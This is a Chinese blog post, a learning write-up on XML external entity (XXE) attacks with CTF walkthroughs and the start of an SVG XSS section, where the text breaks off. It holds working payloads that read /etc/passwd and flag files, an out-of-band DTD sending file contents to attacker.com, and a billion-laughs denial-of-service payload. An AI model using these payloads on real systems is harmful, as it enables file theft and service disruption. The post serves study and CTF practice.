

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/3.png">
  <link rel="icon" href="/img/3.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Zomnap">
  <meta name="keywords" content="">
  
    <meta name="description" content="XXE前置知识(部分资料借鉴于XXE漏洞学习 - Suzen)​	XXE 是一种 XML 外部实体注入漏洞。当应用程序解析用户提交的 XML 时，如果启用了外部实体解析，并且没有正确过滤或限制，攻击者可以通过定义外部实体来读取服务器本地文件发起 SSRF 等。 1.基础的xxe利用方式基础文件读取（有回显） 原理：通过定义外部实体引用本地文件（如 &#x2F;etc&#x2F;passwd），当">
<meta property="og:type" content="article">
<meta property="og:title" content="记录一次有关XXE漏洞的学习及有关svg的xss和xxe漏洞">
<meta property="og:url" content="https://zomnap.github.io/2026/04/07/xxe/index.html">
<meta property="og:site_name" content="Zomnap的博客">
<meta property="og:description" content="XXE前置知识(部分资料借鉴于XXE漏洞学习 - Suzen)​	XXE 是一种 XML 外部实体注入漏洞。当应用程序解析用户提交的 XML 时，如果启用了外部实体解析，并且没有正确过滤或限制，攻击者可以通过定义外部实体来读取服务器本地文件发起 SSRF 等。 1.基础的xxe利用方式基础文件读取（有回显） 原理：通过定义外部实体引用本地文件（如 &#x2F;etc&#x2F;passwd），当">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://zomnap.github.io/img/7.jpeg">
<meta property="article:published_time" content="2026-04-07T10:30:22.000Z">
<meta property="article:modified_time" content="2026-05-24T02:43:17.718Z">
<meta property="article:author" content="Zomnap">
<meta property="article:tag" content="XEE漏洞">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://zomnap.github.io/img/7.jpeg">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>记录一次有关XXE漏洞的学习及有关svg的xss和xxe漏洞 - Zomnap的博客</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"zomnap.github.io","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  

  

  

  



  
<!-- hexo injector head_end start --><link rel="stylesheet" href="/css/custom.css"><!-- hexo injector head_end end --><meta name="generator" content="Hexo 8.1.1"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 100vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Saki的博客</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/7.jpeg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.5)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="记录一次有关XXE漏洞的学习及有关svg的xss和xxe漏洞"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2026-04-07 18:30" pubdate>
          2026年4月7日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          3.1k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          27 分钟
        
      </span>
    

    
    
      
        <span id="busuanzi_container_page_pv" class="post-meta">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          本文阅读 <span id="busuanzi_value_page_pv">0</span> 次
        </span>

      
    
  </div>


        
      </div>

      
        <div class="scroll-down-bar">
          <i class="iconfont icon-arrowdown"></i>
        </div>
      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">记录一次有关XXE漏洞的学习及有关svg的xss和xxe漏洞</h1>
            
              <p id="updated-time" class="note note-info" style="">
                
                  
                    本文最后更新于 2026年5月24日 上午
                  
                
              </p>
            
            
              <div class="markdown-body">
                
                <h2 id="XXE前置知识-部分资料借鉴于XXE漏洞学习-Suzen"><a href="#XXE前置知识-部分资料借鉴于XXE漏洞学习-Suzen" class="headerlink" title="XXE前置知识(部分资料借鉴于XXE漏洞学习 - Suzen)"></a>XXE前置知识(部分资料借鉴于<a target="_blank" rel="noopener" href="https://yschen20.github.io/2025/10/04/XXE%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0/">XXE漏洞学习 - Suzen</a>)</h2><p>​	XXE 是一种 XML 外部实体注入漏洞。当应用程序解析用户提交的 XML 时，如果启用了外部实体解析，并且没有正确过滤或限制，攻击者可以通过定义外部实体来读取服务器本地文件发起 SSRF 等。</p>
<h3 id="1-基础的xxe利用方式"><a href="#1-基础的xxe利用方式" class="headerlink" title="1.基础的xxe利用方式"></a>1.基础的xxe利用方式</h3><p>基础文件读取（有回显）</p>
<p>原理：通过定义外部实体引用本地文件（如 &#x2F;etc&#x2F;passwd），当 XML 被解析且内容被回显时，文件内容会直接出现在响应中。</p>
<p>前提：后端解析 XML 并将字段内容返回给用户。</p>
<p>用途：读取敏感文件（配置密码flag 等）。</p>
<h3 id="2-Base64-编码绕过"><a href="#2-Base64-编码绕过" class="headerlink" title="2.Base64 编码绕过"></a>2.Base64 编码绕过</h3><p>原理：利用 PHP 的 php:&#x2F;&#x2F;filter 流包装器，在读取文件时自动进行 Base64 编码，避免明文内容触发关键词过滤（如flag）。</p>
<p>前提：后端使用 PHP 且支持流包装器。</p>
<p>用途：绕过输出内容中的敏感词检测。</p>
<h3 id="3-带外数据外传（OOB-Out-of-Band）"><a href="#3-带外数据外传（OOB-Out-of-Band）" class="headerlink" title="3.带外数据外传（OOB - Out-of-Band）"></a>3.带外数据外传（OOB - Out-of-Band）</h3><p>原理：当服务器不回显解析结果时，通过构造恶意 DTD 文件，让目标服务器在解析过程中主动向攻击者控制的服务器发起 HTTP 或 DNS 请求，并将文件内容嵌入请求的 URL 或子域名中。</p>
<p>前提：目标允许外联（可访问互联网或内网特定服务）。</p>
<p>用途：在无回显场景下窃取数据。</p>
<h3 id="4-XInclude-注入"><a href="#4-XInclude-注入" class="headerlink" title="4.XInclude 注入"></a>4.XInclude 注入</h3><p>原理：利用 XML 标准中的 XInclude 功能动态包含外部资源，无需声明 DOCTYPE 或 ENTITY，从而绕过基于 DTD 的检测规则。</p>
<p>前提：后端 XML 解析器支持并启用了 XInclude（如 JavaPython lxml）。</p>
<p>用途：在严格过滤 &amp;amp;lt;!DOCTYPE 的环境中实现文件读取。</p>
<h3 id="5-SSRF（服务端请求伪造）"><a href="#5-SSRF（服务端请求伪造）" class="headerlink" title="5.SSRF（服务端请求伪造）"></a>5.SSRF（服务端请求伪造）</h3><p>原理：通过 http:&#x2F;&#x2F; 或 https:&#x2F;&#x2F; 协议的外部实体，让服务器向内网或第三方服务发起请求。</p>
<p>前提：解析器允许网络协议。</p>
<p>用途：探测内网服务（如云元数据接口 169.254.169.254）攻击内部系统。</p>
<h3 id="6-源码泄露（PHP-环境）"><a href="#6-源码泄露（PHP-环境）" class="headerlink" title="6.源码泄露（PHP 环境）"></a>6.源码泄露（PHP 环境）</h3><p>原理：使用 php:&#x2F;&#x2F;filter 读取 PHP 源文件而不执行，获取应用逻辑硬编码凭证或真实 flag 路径。</p>
<p>前提：目标为 PHP 应用。</p>
<p>用途：辅助进一步攻击或直接获取 flag。</p>
<h3 id="7-命令执行（极少见）"><a href="#7-命令执行（极少见）" class="headerlink" title="7.命令执行（极少见）"></a>7.命令执行（极少见）</h3><p>原理：在 PHP 启用了危险的 expect 模块时，可通过 expect:&#x2F;&#x2F; 协议执行系统命令。</p>
<p>前提：expect 扩展启用（默认不安装）。</p>
<p>用途：远程代码执行（RCE），但现实中几乎不可用。</p>
<h3 id="8-WAF-绕过技巧（混淆与编码）"><a href="#8-WAF-绕过技巧（混淆与编码）" class="headerlink" title="8.WAF 绕过技巧（混淆与编码）"></a>8.WAF 绕过技巧（混淆与编码）</h3><p>原理：通过大小写变换Unicode 实体编码协议变种等方式，绕过基于字符串匹配的 Web 应用防火墙（WAF）。</p>
<p>前提：WAF 规则简单，未做语义分析。</p>
<p>用途：使标准 payload 不被拦截。</p>
<h3 id="9-二次注入-嵌套实体（进阶-OOB）"><a href="#9-二次注入-嵌套实体（进阶-OOB）" class="headerlink" title="9.二次注入 &#x2F; 嵌套实体（进阶 OOB）"></a>9.二次注入 &#x2F; 嵌套实体（进阶 OOB）</h3><p>原理：在外部 DTD 中动态构造新的实体，实现多阶段解析，将文件内容拼接到外联请求中。</p>
<p>前提：支持参数实体和嵌套引用。</p>
<p>用途：实现更隐蔽更可靠的 OOB 数据外传。</p>
<h2 id="实践"><a href="#实践" class="headerlink" title="实践"></a>实践</h2><p>首先我们都得有一个最基础的框架：</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-meta">&lt;?xml version=<span class="hljs-string">&quot;1.0&quot;</span> encoding=<span class="hljs-string">&quot;utf-8&quot;</span>?&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">root</span>&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">root</span>&gt;</span><br></code></pre></td></tr></table></figure>

<p>然后呢就是通过抓包看输入进去的文本的标签，比如说登录一个账号密码，可能他的框架就是</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-tag">&lt;<span class="hljs-name">user</span>&gt;</span><br>    <span class="hljs-tag">&lt;<span class="hljs-name">username</span>&gt;</span><br>    <span class="hljs-tag">&lt;/<span class="hljs-name">username</span>&gt;</span><br>    <span class="hljs-tag">&lt;<span class="hljs-name">password</span>&gt;</span><br>    <span class="hljs-tag">&lt;/<span class="hljs-name">password</span>&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">user</span>&gt;</span><br></code></pre></td></tr></table></figure>

<p>而我们要做的就是在其中插入我们利用自己创造的标签来实现从外到内的插入</p>
<p>比如说：(外联实例注入)</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-meta">&lt;!DOCTYPE <span class="hljs-keyword">root</span> [</span><br><span class="hljs-meta">  <span class="hljs-meta">&lt;!ENTITY <span class="hljs-keyword">file</span> <span class="hljs-keyword">SYSTEM</span> <span class="hljs-string">&quot;file:///etc/passwd&quot;</span>&gt;</span></span><br><span class="hljs-meta">]&gt;</span>				---创建一个file标签，然后再给这个标签赋予所需要的访问文件路径<br><span class="hljs-tag">&lt;<span class="hljs-name">user</span>&gt;</span><br>    <span class="hljs-tag">&lt;<span class="hljs-name">username</span>&gt;</span><span class="hljs-symbol">&amp;file;</span><br>    <span class="hljs-tag">&lt;/<span class="hljs-name">username</span>&gt;</span><br>    <span class="hljs-tag">&lt;<span class="hljs-name">password</span>&gt;</span><span class="hljs-symbol">&amp;file;</span><br>    <span class="hljs-tag">&lt;/<span class="hljs-name">password</span>&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">user</span>&gt;</span><br></code></pre></td></tr></table></figure>

<p>内联DTD：</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-meta">&lt;?xml version=<span class="hljs-string">&quot;1.0&quot;</span> encoding=<span class="hljs-string">&quot;UTF-8&quot;</span>?&gt;</span><br><span class="hljs-meta">&lt;!DOCTYPE <span class="hljs-keyword">root</span> [</span><br><span class="hljs-meta">  <span class="hljs-meta">&lt;!ELEMENT <span class="hljs-keyword">root</span> (<span class="hljs-keyword">message</span>+)&gt;</span></span><br><span class="hljs-meta">  <span class="hljs-meta">&lt;!ELEMENT <span class="hljs-keyword">message</span> (<span class="hljs-keyword">#PCDATA</span>)&gt;</span></span><br><span class="hljs-meta">  <span class="hljs-meta">&lt;!ENTITY <span class="hljs-keyword">greeting</span> <span class="hljs-string">&quot;Hello, World!&quot;</span>&gt;</span></span><br><span class="hljs-meta">]&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">root</span>&gt;</span><br>  <span class="hljs-tag">&lt;<span class="hljs-name">message</span>&gt;</span><span class="hljs-symbol">&amp;greeting;</span><span class="hljs-tag">&lt;/<span class="hljs-name">message</span>&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">root</span>&gt;</span><br></code></pre></td></tr></table></figure>

<p>总的来说就是修改双引号内的文件内容，然后再让系统执行</p>
<h2 id="接着就是服务器外带"><a href="#接着就是服务器外带" class="headerlink" title="接着就是服务器外带"></a>接着就是服务器外带</h2><p>首先看到的就是</p>
<h3 id="外带xxe攻击"><a href="#外带xxe攻击" class="headerlink" title="外带xxe攻击"></a>外带xxe攻击</h3><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-meta">&lt;?xml version=<span class="hljs-string">&quot;1.0&quot;</span> encoding=<span class="hljs-string">&quot;UTF-8&quot;</span>?&gt;</span><br><span class="hljs-meta">&lt;!DOCTYPE <span class="hljs-keyword">root</span> [</span><br><span class="hljs-meta">  <span class="hljs-meta">&lt;!ENTITY % <span class="hljs-keyword">file</span> <span class="hljs-keyword">SYSTEM</span> <span class="hljs-string">&quot;file:///etc/passwd&quot;</span>&gt;</span></span><br><span class="hljs-meta">  <span class="hljs-meta">&lt;!ENTITY % <span class="hljs-keyword">dtd</span> <span class="hljs-keyword">SYSTEM</span> <span class="hljs-string">&quot;http://attacker.com/exfil.dtd&quot;</span>&gt;</span></span><br><span class="hljs-meta">  %dtd;</span><br><span class="hljs-meta">  %send;</span><br><span class="hljs-meta">]&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">root</span>&gt;</span><br>  <span class="hljs-tag">&lt;<span class="hljs-name">message</span>&gt;</span>test<span class="hljs-tag">&lt;/<span class="hljs-name">message</span>&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">root</span>&gt;</span><br></code></pre></td></tr></table></figure>

<p>我们可以在我们自己的vps里面部署好dtd脚本</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-meta">&lt;!ENTITY % <span class="hljs-keyword">all</span> <span class="hljs-string">&quot;&lt;!ENTITY send SYSTEM &#x27;http://attacker.com/?data=%file;&#x27;&gt;&quot;</span>&gt;</span><br>%all;<br></code></pre></td></tr></table></figure>

<p>这样就可以实现文件外带了</p>
<h3 id="DDOS拒绝服务攻击"><a href="#DDOS拒绝服务攻击" class="headerlink" title="DDOS拒绝服务攻击"></a>DDOS拒绝服务攻击</h3><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-meta">&lt;?xml version=<span class="hljs-string">&quot;1.0&quot;</span> encoding=<span class="hljs-string">&quot;UTF-8&quot;</span>?&gt;</span><br><span class="hljs-meta">&lt;!DOCTYPE <span class="hljs-keyword">root</span> [</span><br><span class="hljs-meta">  <span class="hljs-meta">&lt;!ENTITY <span class="hljs-keyword">xxe</span> <span class="hljs-keyword">SYSTEM</span> <span class="hljs-string">&quot;http://example.com/very-large-file.xml&quot;</span>&gt;</span></span><br><span class="hljs-meta">]&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">root</span>&gt;</span><br>  <span class="hljs-tag">&lt;<span class="hljs-name">message</span>&gt;</span><span class="hljs-symbol">&amp;xxe;</span><span class="hljs-tag">&lt;/<span class="hljs-name">message</span>&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">root</span>&gt;</span><br></code></pre></td></tr></table></figure>

<p>在vps里面部署好</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-meta">&lt;?xml version=<span class="hljs-string">&quot;1.0&quot;</span> encoding=<span class="hljs-string">&quot;UTF-8&quot;</span>?&gt;</span><br><span class="hljs-meta">&lt;!DOCTYPE <span class="hljs-keyword">root</span> [</span><br><span class="hljs-meta">  <span class="hljs-meta">&lt;!ENTITY a <span class="hljs-string">&quot;1&quot;</span>&gt;</span></span><br><span class="hljs-meta">  <span class="hljs-meta">&lt;!ENTITY b <span class="hljs-string">&quot;&amp;a;&amp;a;&amp;a;&amp;a;&amp;a;&amp;a;&amp;a;&amp;a;&amp;a;&amp;a;&quot;</span>&gt;</span></span><br><span class="hljs-meta">  <span class="hljs-meta">&lt;!ENTITY c <span class="hljs-string">&quot;&amp;b;&amp;b;&amp;b;&amp;b;&amp;b;&amp;b;&amp;b;&amp;b;&amp;b;&amp;b;&quot;</span>&gt;</span></span><br><span class="hljs-meta">  <span class="hljs-meta">&lt;!ENTITY d <span class="hljs-string">&quot;&amp;c;&amp;c;&amp;c;&amp;c;&amp;c;&amp;c;&amp;c;&amp;c;&amp;c;&amp;c;&quot;</span>&gt;</span></span><br><span class="hljs-meta">  &lt;!--可以多写点继续扩展实体--&gt;</span><br><span class="hljs-meta">]&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">root</span>&gt;</span><br>  <span class="hljs-tag">&lt;<span class="hljs-name">message</span>&gt;</span><span class="hljs-symbol">&amp;d;</span><span class="hljs-tag">&lt;/<span class="hljs-name">message</span>&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">root</span>&gt;</span><br></code></pre></td></tr></table></figure>

<h2 id="常见的漏洞代码形式"><a href="#常见的漏洞代码形式" class="headerlink" title="常见的漏洞代码形式"></a>常见的漏洞代码形式</h2><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs xml">// Java中的XXE漏洞模式<br>DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();<br>DocumentBuilder builder = factory.newDocumentBuilder();<br>Document document = builder.parse(new InputSource(new StringReader(xmlInput)));<br><br>// Python中的XXE漏洞模式<br>import xml.etree.ElementTree as ET<br>tree = ET.parse(xml_input)<br>root = tree.getroot() <br><br>// PHP中的XXE漏洞模式<br>$dom = new DOMDocument();<br>$dom-&gt;loadXML($xml_input);<br><br>// Node.js中的XXE漏洞模式<br>const libxmljs = require(&quot;libxmljs&quot;);<br>const xmlDoc = libxmljs.parseXml(xml_input);<br></code></pre></td></tr></table></figure>

<h2 id="实战"><a href="#实战" class="headerlink" title="实战"></a>实战</h2><h3 id="新手：0xGame-2025留言板（粉）"><a href="#新手：0xGame-2025留言板（粉）" class="headerlink" title="新手：0xGame 2025留言板（粉）"></a>新手：0xGame 2025留言板（粉）</h3><p>开题</p>
<p>弱密码(admin&#x2F;admin123)爆破后进入题目：</p>
<p><img src="/img/0xGame2025/6.png" srcset="/img/loading.gif" lazyload></p>
<p>十分简洁，就是直接输入插入代码</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-meta">&lt;?xml version=<span class="hljs-string">&quot;1.0&quot;</span> encoding=<span class="hljs-string">&quot;UTF-8&quot;</span>?&gt;</span><br><span class="hljs-meta">&lt;!DOCTYPE <span class="hljs-keyword">root</span> [</span><br><span class="hljs-meta">  <span class="hljs-meta">&lt;!ENTITY <span class="hljs-keyword">file</span> <span class="hljs-keyword">SYSTEM</span> <span class="hljs-string">&quot;php://filter/convert.base64-encode/resource=/etc/passwd&quot;</span>&gt;</span></span><br><span class="hljs-meta">]&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">root</span>&gt;</span><br>  <span class="hljs-tag">&lt;<span class="hljs-name">message</span>&gt;</span><span class="hljs-symbol">&amp;file;</span><span class="hljs-tag">&lt;/<span class="hljs-name">message</span>&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">root</span>&gt;</span><br></code></pre></td></tr></table></figure>

<p><img src="/img/0xGame2025/7.png" srcset="/img/loading.gif" lazyload></p>
<p>发现回显成功，修改文件路径拿到flag</p>
<p><img src="/img/0xGame2025/8.png" srcset="/img/loading.gif" lazyload></p>
<h3 id="中等难度：极客大挑战2025——Image-Viewer"><a href="#中等难度：极客大挑战2025——Image-Viewer" class="headerlink" title="中等难度：极客大挑战2025——Image Viewer"></a>中等难度：极客大挑战2025——Image Viewer</h3><p>开题发现是一个在线浏览图片的网址，故可以联想到svg+xxe漏洞的这样一个形式</p>
<p>尝试简单的payload</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-meta">&lt;?xml version=<span class="hljs-string">&quot;1.0&quot;</span> encoding=<span class="hljs-string">&quot;UTF-8&quot;</span>?&gt;</span><br><span class="hljs-meta">&lt;!DOCTYPE <span class="hljs-keyword">note</span> [</span><br><span class="hljs-meta"><span class="hljs-meta">&lt;!ENTITY <span class="hljs-keyword">file</span> <span class="hljs-keyword">SYSTEM</span> <span class="hljs-string">&quot;file:///flag&quot;</span> &gt;</span></span><br><span class="hljs-meta">]&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">svg</span> <span class="hljs-attr">height</span>=<span class="hljs-string">&quot;100&quot;</span> <span class="hljs-attr">width</span>=<span class="hljs-string">&quot;1000&quot;</span>&gt;</span><br>  <span class="hljs-tag">&lt;<span class="hljs-name">text</span> <span class="hljs-attr">x</span>=<span class="hljs-string">&quot;10&quot;</span> <span class="hljs-attr">y</span>=<span class="hljs-string">&quot;20&quot;</span>&gt;</span><span class="hljs-symbol">&amp;file;</span><span class="hljs-tag">&lt;/<span class="hljs-name">text</span>&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">svg</span>&gt;</span><br></code></pre></td></tr></table></figure>

<p><img src="/img/0xGame2025/9.png" srcset="/img/loading.gif" lazyload></p>
<p>拿到flag</p>
<h2 id="有关SVG文件的上传漏洞"><a href="#有关SVG文件的上传漏洞" class="headerlink" title="有关SVG文件的上传漏洞"></a>有关SVG文件的上传漏洞</h2><h3 id="1-svg造成的xss漏洞"><a href="#1-svg造成的xss漏洞" class="headerlink" title="1.svg造成的xss漏洞"></a>1.svg造成的xss漏洞</h3><p>首先svg的payload构建方式跟xxe是差不多的</p>
<p>SVG 中支持 <code>script</code> 元素，等同于 HTML 中的 <code>script</code> 元素，因此这个位置是面向脚本的。任何定义在<code>script</code>元素中的函数拥有一个跨当前文档的全局范围。</p>
<p>例：用浏览器打开下面的 SVG 图片就会造成 XSS</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-tag">&lt;<span class="hljs-name">svg</span> <span class="hljs-attr">xmlns</span>=<span class="hljs-string">&quot;http://www.w3.org/2000/svg&quot;</span> <span class="hljs-attr">version</span>=<span class="hljs-string">&quot;1.1&quot;</span>&gt;</span><br>   <span class="hljs-tag">&lt;<span class="hljs-name">circle</span> <span class="hljs-attr">cx</span>=<span class="hljs-string">&quot;100&quot;</span> <span class="hljs-attr">cy</span>=<span class="hljs-string">&quot;50&quot;</span> <span class="hljs-attr">r</span>=<span class="hljs-string">&quot;40&quot;</span> <span class="hljs-attr">stroke</span>=<span class="hljs-string">&quot;black&quot;</span> <span class="hljs-attr">stroke-width</span>=<span class="hljs-string">&quot;2&quot;</span> <span class="hljs-attr">fill</span>=<span class="hljs-string">&quot;red&quot;</span> /&gt;</span><br>  